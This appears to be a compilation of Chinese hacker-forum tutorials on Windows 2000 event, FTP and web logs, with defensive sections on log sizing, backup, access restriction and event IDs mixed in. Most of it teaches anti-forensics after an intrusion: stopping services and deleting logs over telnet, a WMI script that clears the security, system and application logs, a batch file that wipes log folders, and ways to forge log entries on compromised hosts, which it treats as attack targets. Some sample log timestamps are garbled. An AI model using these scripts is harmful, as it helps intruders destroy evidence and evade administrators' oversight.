FTP日誌→FTP日誌和WWW默認日誌爲每天生成一個日誌文件,包含了每天的一切記錄,文件名通常爲ex(年份)(月份)(日期),
例如ex051218,就是2005年12月18日記錄的日誌,選用記事本打開方式就可直接打開,如下例:
#Software: Microsoft Internet Information Services 5.0(微軟IIS5.0)
#Version: 1.0 (版本1.0) #Date: 20051218 0516 (服務啓動時間日期)
#Fields: time cip csmethod csuristem scstatus
0315 192.168.1.30 [1]user administator 331 (IP地址爲192.168.1.30用戶名爲administator試圖登錄)
0318 192.168.1.30 [1]pass – 123 (登錄失敗)
032:04 192.168.1.30 [1]user new 321 (IP地址爲192.168.1.30用戶名爲new的用戶試圖登錄)
032:06 192.168.1.30 [1]pass – 123 (登錄失敗)
032:09 192.168.1.30 [1]user hack 321 (IP地址爲192.168.1.30用戶名爲hack的用戶試圖登錄)
0322 192.168.1.30 [1]pass – 123 (登錄失敗)
0322 192.168.1.30 [1]user administrators 234 (IP地址爲192.168.1.30用戶名爲administrators試圖登錄)
0324 192.168.1.30 [1]pass – 234 (登錄成功)
0321 192.168.1.30 [1]mkd new 345 (新建目錄失敗)
0325 192.168.1.30 [1]qutt – 123 (退出FTP程序)
從上面日誌記錄裏能看出來IP地址爲192.168.1.30的用戶一直試圖登錄系統,換了4次用戶名和密碼才成功,
可以得知入侵時間、IP地址以及探測的用戶名,如上例入侵者最終是用administrators用
戶名進入的,那麼就要考慮更換此用戶名的密碼,或者重命名administrators用戶。
WWW日誌→WWW服務同FTP服務一樣,產生的日誌也是在%systemroot%/System32/LogFiles/W3SVC1目錄下,
默認日誌爲每天生成一個日誌文件,下面是一個典型的WWW日誌文件:
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 20051120 02:081
#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)
20051120 02:081 192.168.1.29 192.168.1.39 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
20051120 02:085 192.168.1.29 192.168.1.39 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
通過分析第六行,可以看出2000年10月23日,IP地址爲192.168.1.29的用戶通過訪問IP地址
爲192.168.1.39機器的80端口,查看了一個頁面iisstart.asp,這位用戶的瀏覽器爲compatible;+MSIE+5.0;+Windows+98+DigExt,有
經驗的管理員就可通過安全日誌、FTP日誌和WWW日誌來確定入侵者的IP地址以及入侵時間。
既使你刪掉FTP和WWW日誌,但是還是會在系統日誌和安全日誌裏記錄下來,但是較好的是隻顯示了你的
機器名,並沒有你的IP
學會怎樣刪除這些日誌→通過上面知道了日誌的詳細情況,得知日誌文件通常有某項服務在後臺保護,
除了系統日誌、安全日誌、應用程序日誌等等,它們的服務是Windos的關鍵進程,而且與註冊表文件在一塊,
當操作系統(Windows2000)啓動後,啓動服務來保
護這些文件,所以很難刪除,而FTP日誌和WWW日誌以及Scedlgu日誌都是可以輕易地刪除的。
首先要取得Admnistrator密碼或Administrators組成員之一,然後Telnet到遠程主機,先來試着刪除FTP
日誌:
D:/SERVER>del schedlgu.txt
D:/SERVER/SchedLgU.Txt
進程無法訪問文件,因爲另一個程序正在使用此文件。
說過了,後臺有服務保護,先把服務停掉!
D:/SERVER>net stop "task scheduler"
下面的服務依賴於 Task Scheduler 服務。
停止 Task Scheduler 服務也會停止這些服務。
Remote Storage Engine
是否繼續此操作? (Y/N) [N]: y
Remote Storage Engine 服務正在停止....
Remote Storage Engine 服務已成功停止。
Task Scheduler 服務正在停止.
Task Scheduler 服務已成功停止。
OK,它的服務停掉了,同時也停掉了與它有依賴關係的服務。再來試着刪一下!
D:/SERVER>del schedlgu.txt
D:/SERVER>
沒有反應?成功了!下一個是FTP日誌和WWW日誌,原理都是一樣,先停掉相關服務,然後再刪日誌!
D:/SERVER/system32/LogFiles/MSFTPSVC1>del ex*.log
D:/SERVER/system32/LogFiles/MSFTPSVC1>
以上操作成功刪除FTP日誌!再來WWW日誌!
D:/SERVER/system32/LogFiles/W3SVC1>del ex*.log
D:/SERVER/system32/LogFiles/W3SVC1>
OK!恭喜,現在簡單的日誌都已成功刪除。下面就是很難的安全日誌和系統日誌了,守護這些日誌的服
務是Event Log,試着停掉它!
D:/SERVER/system32/LogFiles/W3SVC1>net stop eventlog
這項服務無法接受請求的 "暫停" 或 "停止" 操作。
KAO,I 服了 U,沒辦法,它是關鍵服務。如果不用第三方工具,在命令行上根本沒有刪除安全日誌和系
統日誌的可能!所以還是得用雖然簡單但是速度慢得死機的辦法:打開“控制面板”的“管理工具”中的
“事件查看器”(98沒有,知道用Win2k的好處了吧),在菜單的“操作”項有一個名爲“連接到另一臺
計算機”的菜單,輸入遠程計算機的IP,請耐心等一會,選擇遠程計算機的安全性日誌,右鍵選擇它的屬性:
點擊屬性裏的“清除日誌”按鈕,OK了!安全日誌清除完畢!
目前在不借助第三工具的情況下,能很快,很順利地清除FTP、WWW還有Schedlgu日誌,就是系統日誌和
安全日誌屬於Windows2000的嚴密守護,只能用本地的事件查看器來打開它,因爲在圖形界面下,加之網
速又慢,如果你銀子多,時間閒,還是可以清除它的。綜上所述,介紹了Windows2000的日誌文件以及刪
除方法,但是你必須是Administrator,注意必須作爲管理員或管理組的成員登錄才能打開安全日誌記
錄。該過程適用於 Windows 2000 Professional 計算機,也適用於作爲獨立服務器或成員服務器運行的
Windows 2000 Server 計算機。
至此,Windows2000安全知識基礎講座完畢,還有幾句話要講,大家也看出來了,雖然FTP等等日誌可以很
快清除,但是系統日誌和安全日誌卻不是那麼快、那麼順利地能刪除,如果遇到聰明的管理員,將日誌文
件轉移到另一個地方,想清除可是難上加難啊!!!所以奉勸大家,千萬不要拿國人的主機做試驗
(找小日本的不犯法~~~哈哈~~)
全是很全,不過大家都忽略了一個問題!
如果一個服務器下管理有多個HTTP或FTP站點的話,日誌的,命名方法就不一樣了!會出
現W3SVC1,2,3....而這其中,又有一個是默認的遠程網絡管理日誌(默認端口6959,如果開着這
個……呵呵,很大的一個漏洞!當然要有administrator權限……),所以要想判斷一臺服務器的具
體日誌情況,我個人建議……要抹就抹個乾淨……只要是在logfile下的文件夾,全部刪掉!~~~
win2k的日誌文件詳述及刪除方法
Windows2000的日誌文件通常有應用程序日誌,安全日誌、系統日誌、DNS服務器日誌、FTP日誌、WWW日
志等等,可能會根據服務器所開啓的服務不同。當我們用流光探測時,比如說IPC探測,就會在安全日誌
裏迅速地記下流光探測時所用的用戶名、時間等等,用FTP探測後,也會立刻在FTP日誌中記下IP、時間、
探測所用的用戶名和密碼等等。甚至連流影啓動時需要msvcp60.dll這個動庫鏈接庫,如果服務器沒有這
個文件都會在日誌裏記錄下來,這就是爲什麼不要拿國內主機探測的原因了,他們記下你的IP後會很容易
地找到你,只要他想找你!!還有Scheduler日誌這也是個重要的LOG,你應該知道經常使用的srv.exe就
是通過這個服務來啓動的,其記錄着所有由Scheduler服務啓動的所有行爲,如服務的啓動和停止。
日誌文件默認位置:
應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置:%systemroot%/system32/
config,默認文件大
小512KB,管理員都會改變這個默認大小。安全日誌文件:%systemroot%/system32/config
/SecEvent.EVT
系統日誌文件:%systemroot%/system32/config/SysEvent.EVT
應用程序日誌文件:%systemroot%/system32/config/AppEvent.EVT
Internet信息服務FTP日誌默認位置:%systemroot%/system32/logfiles/
msftpsvc1/,默認每天一個日誌
Internet信息服務WWW日誌默認位置:%systemroot%/system32/logfiles/
w3svc1/,默認每天一個日誌
Scheduler服務日誌默認位置:%systemroot%/schedlgu.txt
以上日誌在註冊表裏的鍵:
應用程序日誌,安全日誌,系統日誌,DNS服務器日誌,它們這些LOG文件在註冊表中的:
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Eventlog
有的管理員很可能將這些日誌重定位。其中EVENTLOG下面有很多的子表,裏面可查到以上日誌的定位目錄。
Schedluler服務日誌在註冊表中
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/SchedulingAgent
windows日誌的保護與僞造
日誌對於系統安全的作用是顯而易見的,無論是網絡管理員還是黑客都非常重視日誌,一個有經驗的管理員往往能夠迅速通過日誌瞭解到系統的安全性能,而一個聰明的黑客往往會在入侵成功後迅速清除掉對自己不利的日誌。下面我們就來討論一下日誌的安全和創建問題。
一:概述:Windows2000的系統日誌文件有應用程序日誌,安全日誌、系統日誌、DNS服務器日誌等等,應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置:%systemroot%/system32/config,默認文件大小512KB。
安全日誌文件:%systemroot%/system32/config/SecEvent.EVT
系統日誌文件:%systemroot%/system32/config/SysEvent.EVT
應用程序日誌文件:%systemroot%/system32/config/AppEvent.EVT
這些LOG文件在註冊表中的:
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Eventlog
有的管理員很可能將這些日誌重定位。其中EVENTLOG下面有很多的子表,裏面可查到以上日誌的定位目錄。
二:作爲網絡管理員:
1。日誌的安全配置:
默認的條件下,日誌的大小爲512KB大小,如果超出則會報錯,並且不會再記錄任何日誌。所以首要任務是更改默認大小,具體方法:註冊表中HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Eventlog對應的每個日誌如系統,安全,應用程序等均有一個maxsize子鍵,修改即可。
下面給出一個來自微軟站點的一個腳本,利用VMI來設定日誌最大25MB,並允許日誌自行覆蓋14天前的日誌:
該腳本利用的是WMI對象, WMI(Windows Management Instrumentation)技術是微軟提供的Windows下的系統管理工具。通過該工具可以在本地或者管理客戶端系統中幾乎一切的信息。很多專業的網絡管理工具都是基於WMI開發的。該工具在Win2000以及WinNT下是標準工具,在Win9X下是擴展安裝選項。所以以下的代碼在2000以上均可運行成功。
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Security)}!//" & _
strComputer & "/root/cimv2") '獲得VMI對象
Set colLogFiles = objWMIService.ExecQuery _
("Select * from Win32_NTEventLogFile")
For each objLogfile in colLogFiles
strLogFileName = objLogfile.Name
Set wmiSWbemObject = GetObject _
("winmgmts:{impersonationLevel=Impersonate}!//./root/cimv2:" _
& "Win32_NTEventlogFile.Name='" & strLogFileName & "'")
wmiSWbemObject.MaxFileSize = 2500000000
wmiSWbemObject.OverwriteOutdated = 14
wmiSWbemObject.Put_
Next
將上述腳本用記事本存盤爲vbs爲後綴的即可使用。
另外需要說明的是代碼中的strComputer="."在windows腳本中的含義相當於localhost,如果要在遠程主機上執行代碼,只需要把"."改動爲主機名,當然首先得擁有對方主機的管理員權限並建立IPC連接.本文中的代碼所出現的strComputer均可作如此改動.
2。日誌的查詢與備份:
一個優秀的管理員是應該養成備份日誌的習慣,如果有條件的話還應該把日誌轉存到備份機器上或直接轉儲到打印機上,筆者還有一篇文章《利用腳本編程格式化輸出系統日誌》,詳細的講述了利用windows腳本把日誌轉儲並輸出成html頁已便於查詢,有興趣的可以查看,在這裏推薦微軟的resourceKit工具箱中的dumpel.exe,他的常用方法:
dumpel -f filename -s //server -l log
-f filename 輸出日誌的位置和文件名
-s //server 輸出遠程計算機日誌
-l log log 可選的爲system,security,application,可能還有別的如DNS等
如要把目標服務器server上的系統日誌轉存爲backupsystem.log可以用以下格式:
dumpel //server -l system -f backupsystem.log
再利用計劃任務可以實現定期備份系統日誌。
另外利用腳本編程的VMI對象也可以輕而易舉的實現日誌備份:
下面給出備份application日誌的代碼:
backuplog.vbs
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Backup)}!//" & _
strComputer & "/root/cimv2") '獲得 VMI對象
Set colLogFiles = objWMIService.ExecQuery _
("Select * from Win32_NTEventLogFile where LogFileName='Application'") '獲取日誌對象中的應用程序日誌
For Each objLogfile in colLogFiles
errBackupLog = objLogFile.BackupEventLog("f:/application.evt") '將日誌備份爲f:/application.evt
If errBackupLog <> 0 Then
Wscript.Echo "The Application event log could not be backed up."
else Wscript.Echo "success backup log"
End If
Next
程序說明:如果備份成功將窗口提示:"success backup log" 否則提示:"The Application event log could not be backed up",此處備份的日誌爲application 備份位置爲f:/application.evt,可以自行修改,此處備份的格式爲evt的原始格式,用記事本打開則爲亂碼,這一點他不如dumpel用得方便。
三:作爲黑客
1。日至清除
一個入侵系統成功後的黑客第一件事便是清除日誌,如果以圖形界面遠程控制對方機器或是從終端登陸進入,刪除日誌不是一件困難的事,由於日誌雖然也是作爲一種服務運行,但不同於http,ftp這樣的服務,可以在命令行下先停止,再刪除,在m命令行下用net stop eventlog是不能停止的,所以有人認爲在命令行下刪除日誌是很困難的,實際上不是這樣,下面介紹幾種方法:
1.藉助第三方工具:如小榕的elsave.exe遠程清除system,applicaton,security的軟件,使用方法很簡單,首先利用獲得的管理員賬號與對方建立ipc會話,net use //ip pass /user: user
然後命令行下:elsave -s //ip -l application -C,這樣就刪除了安全日誌。
其實利用這個軟件還可以進行備份日誌,只要加一個參數 -f filename就可以了,在此不再詳述。
2.利用腳本編程中的VMI,也可以實現刪除日誌,首先獲得object對象,然後利用其clearEventLog() 方法刪除日誌。源代碼:
cleanevent.vbs
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Backup)}!//" & _
strComputer & "/root/cimv2")
dim mylogs(3)
mylogs(1)="application"
mylogs(2)="system"
mylogs(3)="security"
for Each logs in mylogs
Set colLogFiles = objWMIService.ExecQuery _
("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'")
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog()
Next
next
在上面的代碼中,建立一個數組,爲application,security,system如果還有其他日誌也可以加入數組。
然後用一個for 循環,刪除數組中的每一個元素,即各個日誌.
2。創建日誌:
刪除日誌後,任何一個有頭腦的管理員面對空空的日誌,馬上就會反應過來被入侵了,所以一個聰明的黑客的學會如何
僞造日誌:
1。利用腳本編程中的eventlog方法是創造日誌變得非常簡單;下面看一個代碼
createlog.vbs
set ws=wscript.createobject("Wscript.shell")
ws.logevent 0 ,"write log success" '創建一個成功執行日誌
這個代碼很容易閱讀,首先獲得wscript的一個shell對象,然後利用shell對象的logevent方法
logevent的用法:logevent eventtype,"description" [,remote system]
eventtype 爲日誌類型,可以使用的如下:0 代表成功執行,1 執行出錯 ,2 警告 , 4,信息 ,8 成功審計 16 故障審計
所以上面代碼中,把0改爲1,2,4,8,16均可,引號下的爲日誌描述。
這種方法寫的日誌有一個缺點,只能寫到應用程序日誌,而且日至來源只能爲wsh,即windows scripting host,所以不能起太多的隱蔽作用。
2,微軟爲了方便系統管理員和程序員,在xp下有個新的命令行工具,eventcreate.exe,利用它,創建日誌更加簡單。
eventcreate -s server -l logname -u username -p password -so source -t eventtype -id id -d description
含義:-s 爲遠程主機創建日誌: -u 遠程主機的用戶名 -p 遠程主機的用戶密碼
-l 日誌;可以創建system和application 不能創建security日誌,
-so 日誌來源,可以是任何日誌 -t 日誌類型 如information信息,error錯誤,warning 警告,
-d 日誌描述,可以是任意語句 -id 自主日誌爲1-1000之內
例如,我們要本地創建一個系統日誌,日至來源爲admin,日誌類型是警告,描述爲"this is a test",事件ID爲500
可以用如下參數
eventcreate -l system -so administrator -t warning -d "this is a test" -id 500
這個工具不能創建安全日誌。至於如何創建安全日誌,希望大家能夠找到一個好方法!
簡單安全的刪除自己在肉雞日誌文件裏的IP
我覺得行最簡單的刪除日誌文件的方法是:在肉雞裏點"開始"-搜索-文件或文件夾,在"包含文字"裏輸入你的IP,其它就不要輸入了,點搜索就行了.
這個方法簡單安全,記住一定要在"包含文字"裏輸入你的IP,不要在其它地方輸入.這個方法百分之百的有效
大家不要笑我偷懶哦!就是這麼簡單
@net stop w3svc
@del c:/winnt/system32/logfiles/*.*
@del c:/winnt/system32/config/*.evt
@del c:/winnt/system32/dtclog/*.*
@del c:/winnt/system32/*.log
@del c:/winnt/system32/*.txt
@del c:/winnt/*.txt
@del c:/winnt/*.log
@del c:/del.bat
@del h:/winnt/system32/*.ip
@net start w3svc
由於我們單位的計算機不多,多人共用四臺,以前使用Windows 98,簡直讓我傷透了腦筋,老是有人向我抱怨別人偷看了或是刪改了他的文件(被重新編輯了或是刪除)。而作爲管理員的我,頭痛的是根本就沒有辦法來監督每個人的操作。現在幾臺機器全部裝上了Windows 2000,我可以對不同的用戶賦予不同的權限,關鍵是可以限制登錄用戶去偷看或是刪改其他用戶的文件,而且我對所有用戶的私人文件夾都設置了權限,並且使用了審覈功能,只許本人使用。夠嚴密了吧?可還是不可避免有個別用戶想方設法要偷看其他用戶的私人文件夾,怎麼辦呢?還好有了事件日誌,通過它,我可以追蹤這些讓我不得安寧的壞人了,當然它也讓我在維護計算機時輕鬆了不少。
什麼是事件日誌呢?事件日誌是專門記錄計算機硬件、軟件和系統整體方面的錯誤信息,也記錄一些安全方面的問題。Windows 2000有三種類型的事件日誌:
1、系統日誌
這種日誌跟蹤各種各樣的系統事件,包括Windows系統組件出現的問題,比如跟蹤系統啓動過程中的事件、硬件和控制器的故障、啓動時某個驅動程序加載失敗等。
2、應用程序日誌
這種日誌跟蹤應用程序關聯的事件,比如應用程序產生的像裝載DLL(動態鏈接庫)失敗的信息將出現在日誌中。
3、安全日誌
這種日誌跟蹤事件如登錄上網、下網、改變訪問權限以及系統啓動和關閉。只是安全日誌的默認狀態是關閉的,這是我在設置本地安全策略後才產生的。
在事件日誌中,以下面幾種情況來表示整個系統運行過程中出現的事件:
(1)“錯誤”是指比較嚴重的問題,通常是出現了數據丟失或功能丟失。
(2)“警告”則表明情況暫時不嚴重,但可能會在將來引起錯誤,比如磁盤空間太少等。
(3)“信息”則是記錄運行成功的事件。
另外,安全日誌則直接以成功審覈和失敗審覈來標識事件的成功與否。
由此可見,在這些事件日誌裏,存放着一些非常重要的信息,因爲它記錄着所有用戶的操作,包括被審計了的操作,但是在默認的情況下,Guest和匿名用戶是可以查看事件日誌的,個別別有用心的人做了壞事之後,總是想要查看事件日誌上是否記錄他的行爲並且伺機抹掉他的活動痕跡,如刪除日誌文件,讓我這個管理員事後想要取證也難,所以必須禁止Guest和匿名用戶訪問事件日誌,我利用修改註冊表的方法來達到了禁止Guest訪問事件日誌的目的。
方法如下:
打開註冊表編輯器(在[開始]→[運行]框中輸入“regedit”回車);
禁止查看應用日誌
定位到 HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/EventLog /Application
新建一個雙字節值,名稱爲:RestrictGuestAccess,值設爲1。
禁止查看系統日誌
定位到 HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/EventLog/ System
新建一個雙字節值,名稱爲:RestrictGuestAccess,值設爲1。
禁止查看安全日誌
在默認安裝情況下,安全日誌只有管理員才能查看。但是爲避免別人在本地安全策略中修改權限,我們仍可以修改註冊表要達到禁止查看的目的。定位到 HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/EventLog/ Security
新建一個雙字節值,名稱爲:RestrictGuestAccess,值設爲1。
設置完以後,關閉註冊表編輯器,重新啓動計算機,以普通的Guest用戶登錄一看,哈哈,Guest用戶已經不能查看事件日誌了,就這樣我輕鬆地保護了這幾臺計算機的事件日誌,這些日誌只有我這個管理員纔可以查看,爲避免自己的行爲被日誌記錄後被我警告,那些人再也不敢亂動機器了。
安全事件日誌中的事件編號與描述
帳號登錄事件
(事件編號與描述)
672 身份驗證服務(AS)票證得到成功發行與驗證。
673 票證授權服務(TGS)票證得到授權。TGS是一份由Kerberos 5.0版票證授權服務(TGS)發行、且允許用戶針對域中特定服務進行身份驗證的票證。
674 安全主體重建AS票證或TGS票證。
675 預身份驗證失敗。這種事件將在用戶輸入錯誤密碼時由密鑰分發中心(KDC)生成。
676 身份驗證票證請求失敗。這種事件在Windows XP Professional操作系統或Windows Server產品家族成員中將不會產生。
677 TGS票證無法得到授權。這種事件在Windows XP Professional操作系統或Windows Server產品家族成員中將不會產生。
678 指定帳號成功映射到一個域帳號。
681 登錄失敗。域帳號嘗試進行登錄。這種事件在Windows XP Professional操作系統或Windows Server產品家族成員中將不會產生。
682 用戶重新連接到一個已經斷開連接的終端服務器會話上。
683 用戶在沒有註銷的情況下與終端服務器會話斷開連接。
帳號管理事件
624 一個用戶帳號被創建。
627 一個用戶密碼被修改。
628 一個用戶密碼被設置。
630 一個用戶密碼被刪除。
631 一個全局組被創建。
632 一個成員被添加到特定全局組中。
633 一個成員從特定全局組中被刪除。
634 一個全局組被刪除。
635 一個新的本地組被創建。
636 一個成員被添加到本地組中。
637 一個成員從本地組中被刪除。
638 一個本地組被刪除。
639 一個本地組帳號被修改。
641 一個全局組帳號被修改。
642 一個用戶帳號被修改。
643 一個域策略被修改。
644 一個用戶帳號被自動鎖定。
645 一個計算機帳號被創建。
646 一個計算機帳號被修改。
647 一個計算機帳號被刪除。
648 一個禁用安全特性的本地安全組被創建。說明:正式名稱中的SECURITY_DISABLED意味着這個組無法用於在訪問檢查中授予權限。
649 一個禁用安全特性的本地安全組被修改。
650 一個成員被添加到一個禁用安全特性的本地安全組中。
651 一個成員從一個禁用安全特性的本地安全組中被刪除。
652 一個禁用安全特性的本地組被刪除。
653 一個禁用安全特性的全局組被創建。
654 一個禁用安全特性的全局組被修改。
655 一個成員被添加到一個禁用安全特性的全局組中。
656 一個成員從一個禁用安全特性的全局組中被刪除。
657 一個禁用安全特性的全局組被刪除。
658 一個啓用安全特性的通用組被創建。
659 一個啓用安全特性的通用組被修改。
660 一個成員被添加到一個啓用安全特性的通用組中。
661 一個成員從一個啓用安全特性的通用組中被刪除。
662 一個啓用安全特性的通用組被刪除。
663 一個禁用安全特性的通用組被創建。
664 一個禁用安全特性的通用組被修改。
665 一個成員被添加到一個禁用安全特性的通用組中。
666 一個成員從一個禁用安全特性的通用組中被刪除。
667 一個禁用安全特性的通用組被刪除。
668 一個組類型被修改。
684 管理組成員的安全描述符被設置。說明:在域控制器上,一個後臺線程每60秒將對管理組中的所有成員(如域管理員、企業管理員和架構管理員)進行一次搜索並對其應用一個經過修復的安全描述符。這種事件將被記錄下來。
685 一個帳號名稱被修改。
審覈登錄事件
528 用戶成功登錄到計算機上。
529 登錄失敗:試圖使用未知用戶名或帶有錯誤密碼的已知用戶名進行登錄。
530 登錄失敗:試圖在允許時間範圍以外進行登錄。
531 登錄失敗:試圖通過禁用帳號進行登錄。
532 登錄失敗:試圖通過過期帳號進行登錄。
533 登錄失敗:試圖通過不允許在特定計算機上進行登錄的用戶帳號進行登錄。
534 登錄失敗:用戶試圖通過不允許使用的密碼類型進行登錄。
535 登錄失敗:針對指定帳號的密碼已經過期。
536 登錄失敗:網絡登錄服務未被激活。
537 登錄失敗:由於其它原因導致登錄失敗。說明:在某些情況下,登錄失敗原因可能無法確定。
538 針對某一用戶的註銷操作完成。
539 登錄失敗:登錄帳號在登錄時刻已被鎖定。
540 用戶成功登錄到網絡。
541 本地計算機與所列對等客戶身份標識之間的主模式Internet密鑰交換(IKE)身份驗證操作已經完成(建立一條安全關聯),或者快速模式已經建立一條數據通道。
542 數據通道被中斷。
543 主模式被中斷。說明:這種事件可能在安全關聯時間限制到期(缺省值爲8小時)、策略修改或對等客戶中斷時發生。
544 由於對等客戶未能提供合法證書或簽署未通過驗證導致主模式身份驗證失敗。
545 由於Kerberos失敗或密碼不合法導致主模式身份驗證失敗。
546 由於對等客戶發送非法了非法提議,IKE 安全關聯建立沒有成功。收到一個包含非法數據的數據包。
547 IKE握手過程中發生錯誤。
548 登錄失敗:來自信任域的安全標識符(SID)與客戶端的帳號域SID不匹配。
549 登錄失敗:在跨域身份驗證過程中,所有同非信任名稱空間相對應的SID均已被過濾掉。
550 能夠指示可能發生拒絕服務(DoS)攻擊的通知消息。
551 用戶發起註銷操作。
552 用戶在已經通過其他身份登錄的情況下使用明確憑據成功登錄到計算機上。
682 用戶重新連接到一個已經斷開連接的終端服務器會話上。
683 用戶在沒有註銷的情況下與終端服務器會話斷開連接。說明:這種事件將在用戶通過網絡與終端服務器會話建立連接時產生。它將出現在終端服務器上。
對象訪問事件
560 訪問由一個已經存在的對象提供授權。
562 一個對象訪問句柄被關閉。
563 試圖打開並刪除一個對象。說明:當您在Createfile()函數中指定FILE_DELETE_ON_CLOSE標誌時,這種事件將被文件系統所使用。
564 一個保護對象被刪除。
565 訪問由一種已經存在的對象類型提供授權。
567 一種與句柄相關聯的權限被使用。說明:一個授予特定權限(讀取、寫入等)的句柄被創建。當使用這個句柄時,至多針對所用到的每種權限產生一次審覈。
568 試圖針對正在進行審覈的文件創建硬連接。
569 身份驗證管理器中的資源管理器試圖創建客戶端上下文。
570 客戶端試圖訪問一個對象。說明:針對對象的每次操作嘗試都將產生一個事件。
571 客戶端上下文被身份驗證管理器應用程序刪除。
572 管理員管理器初始化應用程序。
772 證書管理器拒絕了掛起的證書申請。
773 證書服務收到重新提交的證書申請。
774 證書服務吊銷了證書。
775 證書服務收到發行證書吊銷列表(CRL) 的請求。
776 證書服務發行了證書吊銷列表(CRL)。
777 更改了證書申請擴展。
778 更改了多個證書申請屬性。
779 證書服務收到關機請求。
780 已開始證書服務備份。
781 已完成證書服務備份。
782 已開始證書服務還原。
783 已完成證書服務還原。
784 證書服務已經開始。
785 證書服務已經停止。
786 證書服務更改的安全權限。
787 證書服務檢索了存檔密鑰。
788 證書服務將證書導入數據庫中。
789 證書服務更改的審覈篩選。
790 證書服務收到證書申請。
791 證書服務批准了證書申請並頒發了證書。
792 證書服務拒絕證書申請。
793 證書服務將證書申請狀態設爲掛起。
794 證書服務更改的證書管理器設置
795 證書服務更改的配置項。
796 證書服務更改屬性。
797 證書服務存檔了密鑰。
798 證書服務導入和存檔了密鑰。
799 證書服務將證書發行機構(CA)證書發行到Active Directory。
800 從證書數據庫刪除一行或多行。
801 角色分隔被啓用。
審覈策略更改事件
608 用戶權限已被分配。
609 用戶權限已被刪除。
610 與另一個域的信任關係已被創建。
611 與另一個域的信任關係已被刪除。
612 審覈策略已被更改。
613 Internet協議安全性(IPSec)策略代理已經啓動。
614 IPSec策略代理已被禁用。
615 IPSec策略代理已被更改。
616 IPSec策略代理遇到一個潛在的嚴重問題。
617 Kerberos 5.0版策略已被更改。
618 經過加密的數據恢復策略已更改。
620 與另一個域的信任關係已被修改。
621 系統訪問權限已被授予帳號。
622 系統訪問權限已從帳號中刪除。
623 審覈策略以對等用戶爲單位進行設置。
625 審覈策略以對等用戶爲單位進行刷新。
768 檢測到一個森林中的名稱空間元素與另一個森林中的名稱空間元素髮生衝突。說明:當一個森林中的名稱空間元素與另一個森林中的名稱空間元素髮生重疊時,它將無法明確解析屬於這兩個名稱空間元素的名稱。這種重疊現象也稱作衝突。並非針對每種記錄類型的參數均合法。舉例來說,諸如DNS名稱、NetBIOS名稱和SID之類的字段對於“TopLevelName”類型的記錄便是非法的。
769 添加了受信任的森林信息。說明:這種事件消息將在更新受信任的森林信息以及添加一條或多條記錄時生成。針對每條添加、刪除或修改的記錄都將生成一條事件消息。如果在針對森林信任信息的單一更新操作中添加、刪除或修改多條記錄,生成的所有事件消息都將被分配一個相同且唯一標識符(稱作操作編號)。這種方式使您能夠判斷出多條事件消息是由一次操作生成的。並非針對每種記錄類型的參數均合法。舉例來說,諸如DNS名稱、NetBIOS名稱和SID之類的字段對於“TopLevelName”類型的記錄便是非法的。
770 刪除了受信任的森林信息。說明:查看編號爲769的事件描述。
771 修改了受信任的森林信息。說明:查看編號爲769的事件描述。
805 事件日誌服務讀取針對會話的安權限使用事件
權限使用事件
576 特定權限已被添加到用戶訪問令牌中。說明:這種事件將在用戶登錄時產生。
577 用戶試圖執行受到權限保護的系統服務操作。
578 在已經處於打開狀態的受保護對象句柄上使用權限。
詳細跟蹤事件
592 已經創建新的過程。
593 已經退出某過程。
594 對象的句柄被重複
595 已經取得對象的間接訪問權。
596 數據保護主密鑰備份。說明:主密鑰將供CryptProtectData和CryptUnprotectData例程以及加密文件系統(EFS)所使用。這種主密鑰將在每次創建新增主密鑰時予以備份。(缺省設置爲90天。)密鑰備份操作通常由域控制器執行。
597 數據保護主密鑰已由恢復服務器恢復完畢。
598 審覈數據已得到保護。
599 審覈數據保護已取消。
600 分派給進程一個主令牌。
601 用戶嘗試安裝服務。
602 一個計劃作業已被創建。
面向審覈系統事件的系統事件消息
512 正在啓動 Windows。
513 Windows 正在關機。
514 本地安全機制機構已加載身份驗證數據包。
515 受信任的登錄過程已經在本地安全機制機構註冊。
516 用來列隊審覈消息的內部資源已經用完,從而導致部分審覈數據丟失。
517 審覈日誌已經清除。
518 安全帳戶管理器已經加載通知數據包。
519 一個過程正在試圖通過無效本地過程調用(LPC)端口來模擬客戶端並針對客戶端地址空間執行回覆、讀取或寫入操作。
520 系統時間已更改。說明:這種審覈操作通常成對出現。
保住你的肉雞之日誌的清除
以前寫的,拿出來獻醜一下吧!沒什麼技術性可言,給新手朋友看看的,HOHO!~~~~~~~~~~~~~~~~~~~
有很多朋友,後門安置的都很不錯,可是沒過幾天,肉雞就不能用了,帳戶也沒有了??這是爲什麼,我想你沒有清日誌吧??
清日誌是我入侵後最愛乾的一件事~~而且忘記不了,黑客俗稱出門掃地,呵呵!~~~~~~~~~~那麼要想擦得乾淨,而且也要對要擦的是什麼有所瞭解。我先跟大家說說都是哪些日誌:
一。系統自帶的日誌。你可以如下操作:“開始-》設置—》控制面板-》管理工具-》事件查看器”。來打開系統自帶的日誌。分爲:
1。應用程序日誌:記錄了重要的應用程序產生的錯誤和成功信息。
2。安全日誌:主要記錄着win2k操作系統的組件所產生的日誌,比如IIS中自帶的ftp日誌等等。
3。系統日誌:主要記錄審覈策略的日誌。
說到審覈策略,我也要來說說。這個是不容忽視的,先看一下相關概念:
